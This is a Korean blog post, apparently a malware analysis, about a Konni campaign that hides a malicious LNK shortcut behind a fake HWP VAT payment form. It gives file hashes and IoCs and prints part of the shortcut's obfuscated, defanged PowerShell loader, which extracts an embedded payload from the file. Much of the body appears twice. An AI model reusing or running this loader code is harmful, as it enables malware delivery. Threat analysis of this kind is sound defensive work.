북한 해킹조직 코니(Konni) 위장문서 부가세납부서(국세징수법 시행규칙) 악용한 악성코드 유포(2025.4.28)
Contents
오늘도 존경 전혀 하기 쉽지 않은 북한 해킹조직 코니(Konni) 위장문서 부가세납부서(국세징수법 시행규칙)통해 악성코드에 대해 글을 적어보겠습니다.
해당 악성코드는 부가세납부서(국세징수법 시행규칙-별지 제1호서식)라는 제목으로 위장 하고 있으며 마치 hwp 확장자와 아이콘을 사용하고 있어서 hwp 관련 문서인 것처럼 보이지만 실제적으로는 lnk 파일 로 위장하는 것이 특징입니다.
파일명: 부가세납부서(국세징수법 시행규칙-별지 제1호서식)
사이즈:1 MB
MD5:68a92a2df9d7be6e36bc3efa7d37cebc
SHA-1:2d27304151fc8299288feb08464007912606c527
SHA-256:990c0f2ec42713e0f7d49458da7446f1eee2e640f6ebcce519c2e380785c625c
일단 해당 악성코드 에서는 이미지 파일이 있는데 구미시에 있는 어느 중소기업 정보통신공사업, 통신설비, CC TV설치공사 및 보수, 방송통신공사, 방송장비설치, 컴퓨터주변기기 도산매를 하는 곳을 털었는지 모르겠지만, 아무튼 귀찮게 모자이크 많이 처리하게 생겨서 짜증 나네요.
다시 돌아와서 악성코드에 포함된 진짜 악성코드 lnk 파일은 다음과 같습니다.
파일명:부가세납부서(국세징수법 시행규칙-별지 제1호서식).hwp.lnk
사이즈:2 MB
MD5 80e1758c0d6dcf5de932226958ba3361
SHA-1:928ff0f4bd8cf4e2b6ba7f6fe0e3b497dcd0e705
SHA-256:bdd0438f00d760eb23ae707071672c8667294acc63342a7171e611fdc99527fd
악성코드에 포함된 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPower(s)hell\*(.)exe ^
| findstr /i rshell(.)exe') do (if exist "%f" (%f "funct(i)on few{param($(i)nside); <#as(s
)essment receive#>$classic = $insi(d)e.substring(0,$insi(d)e.l(e)ngth-4) + ''; <#same clos
r#>r(e)turn $classic;};fu(n)ction request{par(a)m($defense); del $d(e)fense /f;};function
fi(g)ure{param($stand,$lan(d)scape,$g(e)sture,$tunne(l),$i(m)mi(g)rant);<#edge medical#> $
interp(r)et=New-Object (S)ystem.IO.FileSt(r)eam(<#demonstrate let#>$stand(,)<#same shine#
>[System(.)IO.FileMode]::Op(e)n,<#refugee fire#>[System.IO(.)File(A)ccess]::Read);<#c(o)n
sume repre(s)entative#> $interp(r)et.Seek(<#approve adviser#>$(l)andscape,[System.IO.Seek
Origin]::Begin);<#outcome anyone#> $soup=$gesture*0(x)01;<#package relatively#> $in=New-O
bject byte[] <#identity row#>$gesture; <#in(s)titution flight#> …
해당 악성코드는 부가세납부서(국세징수법 시행규칙-별지 제1호서식)라는 제목으로 위장 하고 있으며 마치 hwp 확장자와 아이콘을 사용하고 있어서 hwp 관련 문서인 것처럼 보이지만 실제적으로는 lnk 파일 로 위장하는 것이 특징입니다.
파일명: 부가세납부서(국세징수법 시행규칙-별지 제1호서식)
사이즈:1 MB
MD5:68a92a2df9d7be6e36bc3efa7d37cebc
SHA-1:2d27304151fc8299288feb08464007912606c527
SHA-256:990c0f2ec42713e0f7d49458da7446f1eee2e640f6ebcce519c2e380785c625c
일단 해당 악성코드 에서는 이미지 파일이 있는데 구미시에 있는 어느 중소기업 정보통신공사업, 통신설비, CC TV설치공사 및 보수, 방송통신공사, 방송장비설치, 컴퓨터주변기기 도산매를 하는 곳을 털었는지 모르겠지만, 아무튼 귀찮게 모자이크 많이 처리하게 생겨서 짜증 나네요.
다시 돌아와서 악성코드에 포함된 진짜 악성코드 lnk 파일은 다음과 같습니다.
파일명:부가세납부서(국세징수법 시행규칙-별지 제1호서식).hwp.lnk
사이즈:2 MB
MD5 80e1758c0d6dcf5de932226958ba3361
SHA-1:928ff0f4bd8cf4e2b6ba7f6fe0e3b497dcd0e705
SHA-256:bdd0438f00d760eb23ae707071672c8667294acc63342a7171e611fdc99527fd
악성코드에 포함된 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPower(s)hell\*(.)exe ^
| findstr /i rshell(.)exe') do (if exist "%f" (%f "funct(i)on few{param($(i)nside); <#as(s
)essment receive#>$classic = $insi(d)e.substring(0,$insi(d)e.l(e)ngth-4) + ''; <#same clos
r#>r(e)turn $classic;};fu(n)ction request{par(a)m($defense); del $d(e)fense /f;};function
fi(g)ure{param($stand,$lan(d)scape,$g(e)sture,$tunne(l),$i(m)mi(g)rant);<#edge medical#> $
interp(r)et=New-Object (S)ystem.IO.FileSt(r)eam(<#demonstrate let#>$stand(,)<#same shine#
>[System(.)IO.FileMode]::Op(e)n,<#refugee fire#>[System.IO(.)File(A)ccess]::Read);<#c(o)n
sume repre(s)entative#> $interp(r)et.Seek(<#approve adviser#>$(l)andscape,[System.IO.Seek
Origin]::Begin);<#outcome anyone#> $soup=$gesture*0(x)01;<#package relatively#> $in=New-O
bject byte[] <#identity row#>$gesture; <#in(s)titution flight#> …
IoC
bdd0438f00d760eb23ae707071672c8667294acc63342a7171e611fdc99527fd
928ff0f4bd8cf4e2b6ba7f6fe0e3b497dcd0e705
68a92a2df9d7be6e36bc3efa7d37cebc
2d27304151fc8299288feb08464007912606c527
80e1758c0d6dcf5de932226958ba3361
990c0f2ec42713e0f7d49458da7446f1eee2e640f6ebcce519c2e380785c625c
928ff0f4bd8cf4e2b6ba7f6fe0e3b497dcd0e705
68a92a2df9d7be6e36bc3efa7d37cebc
2d27304151fc8299288feb08464007912606c527
80e1758c0d6dcf5de932226958ba3361
990c0f2ec42713e0f7d49458da7446f1eee2e640f6ebcce519c2e380785c625c